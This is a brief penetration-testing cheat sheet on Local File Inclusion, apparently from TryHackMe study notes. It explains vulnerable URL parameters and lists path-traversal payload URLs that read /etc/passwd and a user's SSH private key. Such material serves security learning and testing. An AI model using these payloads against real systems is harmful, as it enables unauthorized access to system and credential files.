847 B
847 B
Local File Inclusion
To test for LFI what we need is a parameter on any URL or any other input fields like request body etc. For example, if the website is tryhackme.com then a parameter in the URL can look like https://tryhackme.com/?file=robots.txt. Here file is the name of the parameter and robots.txt is the value that we are passing (include the file robots.txt).
Usage
- Exploit URL parameter
http://example.com/home?page=about.html
* changed to path traversal, with [interesting files](https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#basic-lfi-null-byte-double-encoding-and-other-tricks)
```
http://example.com/home?page=../../../../etc/passwd
```
or
```
http://example.com/home?page=../../../../home/<username>/.ssh/id_rsa
```